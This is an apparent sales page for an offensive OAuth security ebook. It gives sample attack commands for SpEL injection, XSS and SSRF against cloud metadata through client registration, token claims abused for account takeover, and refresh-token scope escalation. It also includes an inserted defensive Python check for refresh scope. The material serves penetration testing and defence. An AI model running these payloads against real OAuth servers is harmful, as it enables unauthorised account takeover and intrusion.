Broken Token Series — Book 2
13 Original Named Techniques — Not Found Anywhere Else*

BROKEN TOKEN: OAuth

Know every way to break an OAuth flow. Every technique, every payload, tested and ready. PKCE downgrade, DCR injection, token lifecycle abuse, grant flow weaponization — including original research not documented in any public resource.

$19 (regular price $29, save $10) · 30-day money-back guarantee · PDF format · Instant download
[Cover image: Broken Token OAuth book cover]
43 pages · 10 chapters · 13 original techniques* · 22 CVEs covered
Taste the Content

REAL PAYLOADS. REAL TECHNIQUES.

Every technique comes with framework context, CVEs, and a ready-to-use command. No theory without payload.

Chapter 3 — Authorization Request
SpEL Injection via response_type — RCE
TARGET="https://target.com/oauth/authorize"
PAYLOAD='%24%7B7*7%7D'   # ${7*7}
curl -s "$TARGET?response_type=$PAYLOAD\
&client_id=acme&scope=openid\
&redirect_uri=http://test"
# "49" in response body → RCE confirmed
Chapter 6 — Redirect & Callback
DCR Metadata Injection — SSRF + XSS
curl -s -X POST https://target.com/connect/register \
  -H 'Content-Type: application/json' \
  -d '{
    "redirect_uris":["https://app.com/cb"],
    "client_name":"<script>alert(1)</script>",
    "logo_uri":"http://169.254.169.254/latest/meta-data/"
  }'
Chapter 8 — Token & Claims
Mutable Identifier Pattern — account takeover
TOKEN="<id_token>"
echo "$TOKEN" | cut -d. -f2 | python3 -c "
import sys, base64, json
p = sys.stdin.read().strip()
p += '=' * (-len(p) % 4)                       # restore base64 padding
d = json.loads(base64.urlsafe_b64decode(p))    # JWT segments are base64url, not plain base64
[print(k, d[k]) for k in ['sub', 'email', 'hd'] if k in d]"
# email mutable → change to victim's → account takeover
Chapter 9 — Token Lifecycle
Scope Creep at Refresh — privilege escalation
curl -s -X POST https://target.com/token \
  -d "grant_type=refresh_token\
&refresh_token=$RT\
&client_id=app\
&scope=read write admin"
# Decode new token — check scope claim
Table of Contents

ALL 10 CHAPTERS

Each chapter follows the same structure: framework behavior, CVEs, attack primitives, detection.

CH 01
Introduction
What OAuth is, why it breaks, token types, JWT bridge, Find/Forge/Fire methodology
2 pages
CH 02
OAuth Fundamentals
Roles, authorization request parameters, grant types, PKCE, state
3 pages
CH 03
Authorization Request
Authorization Endpoint Parameter Injection (SpEL/XSS) · Response Mode Escape · redirect_uri bypasses · Azure AD research
5 pages
CH 04
Client Identity & State
client_id Session Poisoning · Missing state · Static state (CVE-2023-31999) · Predictable state
4 pages
CH 05
PKCE
S256→plain Method Downgrade · Remove code_verifier · Remove code_challenge · Confidential client PKCE downgrade
4 pages
CH 06
Redirect & Callback
DCR Metadata Injection (SSRF + XSS/impersonation) · Resource Indicator Omission · Open redirect chaining
4 pages
CH 07
Token Exchange
Grant Type Substitution → MFA Bypass · Auth Method Confusion · Code Injection · Code Replay
5 pages
CH 08
Token & Claims
Mutable Identifier Pattern (nOAuth · Google domain takeover · Slack/Zoom hd claim) · Missing aud validation
3 pages
CH 09
Token Lifecycle
Scope Creep at Refresh · OAuth Singleton Race Condition
3 pages
CH 10
Grant Flow Abuse
prompt=none Silent Redirect · Device Code Phishing (Storm-2372 · TA2723 · EvilTokens) · Consent Phishing
4 pages
APX
Appendix — DIY Infrastructure
Discovery one-liners · PKCE generation · Device code polling · DCR payload · Token decode
3 pages
Coverage

EVERY ATTACK LAYER

From the authorization request to grant flow abuse — every layer where OAuth security breaks.

01
13 Original Named Techniques*
DCR Metadata Injection, Mutable Identifier Pattern, OAuth Singleton Race Condition, Response Mode Escape, Scope Creep at Refresh — named and documented here for the first time.
02
Authorization Layer
SpEL/XSS via OAuth parameters, response_mode escape chains, redirect_uri wildcard bypass, path traversal, Azure AD server-side bypass research. 10 CVEs documented.
03
PKCE & State
S256→plain downgrade, verifier and challenge omission bypasses, confidential client PKCE downgrade, missing/static/predictable state. CVE-2023-48228, CVE-2024-23647, CVE-2024-22258.
04
Dynamic Client Registration
SSRF via URI fields, XSS and brand impersonation via display fields. One endpoint, two attack surfaces. Second-order SSRF fires at consent screen render.
05
Token & Claims
Mutable identifier attacks across Azure AD, Google, Okta, GitHub. Per-provider mutability matrix — first published here. Missing aud validation (CVE-2025-9803).
06
Active Threat Intel
Device Code Phishing via Storm-2372, TA2723, EvilTokens PhaaS. prompt=none silent redirect confirmed in active campaigns (March 2026). Current, not historical.
Original Research

NAMED BY THIS BOOK*

Technique classes named, framed, and documented here for the first time.

Mutable Identifier Pattern
Trusting a mutable claim (email, hd) as a stable identity anchor. Covers nOAuth, Google domain takeover, Slack/Zoom hd claim.
OAuth Singleton Race Condition
Concurrent auth flows overwriting shared singleton state — identity swap. GHSA-9q5m-jfc4-wc92, GHSA-2cjm-2gwv-m892.
DCR Metadata Injection
Same /connect/register endpoint: URI fields → SSRF, display fields → XSS/impersonation. CVE-2026-22752, GHSA-pf93-j98v-25pv.
Response Mode Escape
Patch one response_mode, bypass via another. The Keycloak three-CVE chain (CVE-2023-6134 → 6291 → 6927) as one named class.
Scope Creep at Refresh
RFC 6749 §6 silence on broader scope enables privilege escalation at the refresh endpoint. CVE-2025-12110, CVE-2026-1035.
S256→plain Downgrade
Method evaluated per-request, not locked at registration. Applies to all RFC-compliant AS. No CVE — first named writeup.
Grant Type Substitution
MFA bound to browser flow only — alternate grant type bypasses it. CVE-2024-37893 (Firefly III). Keycloak and Auth0 primary targets.
Auth Method Confusion
Client registered with strong method, library silently falls back to weak. Spring Security #9780, MCP TypeScript SDK #951.
Resource Indicator Omission
Omit resource from token request → audience-unbound token. VS Code, IBM, MCP SDK confirmed. RFC 8707 mandatory in MCP spec.
client_id Session Poisoning
Concurrent requests with different client_id overwrite shared AS session state — code delivered to attacker redirect_uri.
prompt=none Silent Redirect
Error delivery to unregistered redirect_uri — open redirector in active phishing campaigns (March 2026). RFC 9700 §4.11.2.
Authorization Endpoint Parameter Injection
OAuth parameters reaching template engine without sanitization. SpEL → RCE (CVE-2016-4977). Pattern live in any framework using server-side templates for error pages.
PKCE Verifier Exposed as State
Developer passes code_verifier as OAuth state, exposing the PKCE secret in the front-channel URL. GHSA-6g25-pc82-vfwp.
* Original as of publication date — first named writeup, first unified framing, or first per-provider matrix for each technique.
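The Chapter 9 "Scope Creep at Refresh" snippet above and the Scope Creep entry in this list both come down to one missing comparison at the refresh endpoint. As an added illustration (not code from the book), here is the buggy behaviour beside the check RFC 6749 §6 requires; REFRESH_STORE, the token values and the client ids are constructed for the example.

```python
# Added illustration (not code from the book): the check a refresh endpoint
# needs to close the "Scope Creep at Refresh" class. RFC 6749 §6: the scope
# requested at refresh MUST NOT include any scope not originally granted.
# REFRESH_STORE and the token/client values are constructed for this example.
from dataclasses import dataclass


@dataclass(frozen=True)
class RefreshGrant:
    client_id: str
    granted_scope: frozenset


# Stand-in for the AS refresh-token table (constructed sample data).
REFRESH_STORE = {
    "rt-demo-1": RefreshGrant("app", frozenset({"read", "write"})),
}


class InvalidGrant(ValueError):
    """RFC 6749 §5.2 'invalid_grant': unknown token or wrong client."""


class InvalidScope(ValueError):
    """RFC 6749 §5.2 'invalid_scope': requested scope exceeds the grant."""


def _lookup(refresh_token, client_id):
    grant = REFRESH_STORE.get(refresh_token)
    if grant is None or grant.client_id != client_id:
        raise InvalidGrant("refresh token not issued to this client")
    return grant


def vulnerable_scope_for_refresh(refresh_token, client_id, scope=None):
    """The bug: whatever scope the client asks for is minted unchanged."""
    grant = _lookup(refresh_token, client_id)
    return set(scope.split()) if scope else set(grant.granted_scope)


def scope_for_refresh(refresh_token, client_id, scope=None):
    """Hardened: no scope parameter reuses the original grant; a scope
    parameter must be a subset of it, and any escalation is rejected."""
    grant = _lookup(refresh_token, client_id)
    if not scope:
        return set(grant.granted_scope)
    requested = set(scope.split())
    escalated = requested - grant.granted_scope
    if escalated:
        raise InvalidScope("not originally granted: " + " ".join(sorted(escalated)))
    return requested
```

Detection-wise, the same comparison run over token-endpoint logs (requested scope at refresh versus scope on the original grant) flags attempts even on an AS that already rejects them.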
Series

EXPAND YOUR ARSENAL

Four independent books. Each covers a distinct token type and attack surface. No reading order required.

BOOK 01
JWT
Algorithm attacks, key injection, claim manipulation, format attacks.
BOOK 02
OAuth
redirect_uri bypass, PKCE downgrade, token lifecycle abuse, grant flow weaponization.
Available now
BOOK 03
OIDC
iss injection, nonce bypass, mix-up attacks, UserInfo manipulation.
Coming soon
BOOK 04
SAML
XML signature wrapping, XXE, parser differential attacks, SSO bypass.
Coming soon
Author
Rodolfo Assis (Brute Logic) · @BRuteLogic
15+ years · 1,461 reports · KNOXSS creator · Brute One · BSides Boston 2016 · DEF CON 25 · Ekoparty 2025 · Top 200 Influencer 2021 · 5 ebooks · 64K+ followers

Brazilian offensive security researcher with 15+ years breaking web applications. Creator of KNOXSS — the most comprehensive automated XSS service, live since 2016 — and X55.is, a universal XSS delivery domain. Founder of Brute One, an AI assistant for bug bounty hunting with tool execution capabilities and proprietary offensive knowledge.

Author of the following offensive security ebooks: First Bounty, The Brute Art of Bypass, SSRF Mastery Series — Fundamentals, Broken Token: JWT, and now Broken Token: OAuth. Writing Security in Collapse, a cyberpunk doctrine for the Intelligence Age. Building the King of Noobs recon suite on GitHub — reKover, unKover, disKover.

Spoke at BSides Boston 2016, DEF CON 25, and Ekoparty 2025. Ranked #1 globally on Open Bug Bounty in 2015 with 1,461 reports. 1,000+ vulnerabilities disclosed against Oracle, Apple, Microsoft, Samsung, Slack, Uber, LinkedIn and others. Listed among 200 Global Cybersecurity Influencers by Check Point (2021). 64K+ followers @BRuteLogic.

FAQ

QUESTIONS

Who is this for?
Intermediate to advanced bug bounty hunters and pentesters who already know what OAuth is and want to know every way to break it. Not a beginner guide.
How is this different from what's already out there?
No dedicated offensive OAuth ebook exists at this depth. Existing resources are either one-page cheat sheets with no PoCs or guided lab environments covering surface-level techniques. This book documents 13 original named technique classes, maps each to a structural root cause, covers 22 CVEs across 6 frameworks, and gives you copy-paste bash commands for every technique.
Do the commands actually work?
Yes. Every command was tested on Ubuntu 24 before inclusion. No placeholder code, no theoretical payloads.
Do I need to read the JWT ebook first?
No. Each book in the Broken Token series is independent. If the access token at your target is a JWT (JSON Web Token), the Broken Token: JWT ebook's techniques apply directly on top — but this book stands alone.
What frameworks are covered?
Keycloak, Spring Authorization Server, Auth0, authentik, Hydra (Ory), node-oauth2-server, @fastify/oauth2, and MCP ecosystem implementations. Per-framework behavior tables in every attack chapter.
Get the book

STOP FINDING THE SAME BUGS EVERYONE ELSE FINDS.

The techniques your competition doesn't know. 43 pages. 13 original techniques. 22 CVEs. Tested payloads.

$19 (regular price $29, save $10)
PDF format  ·  Instant download  ·  30-day money-back guarantee
AI-assisted creation, thoroughly reviewed by the author. All technical content tested for accuracy.
Errors or suggestions: assis@brutelogic.net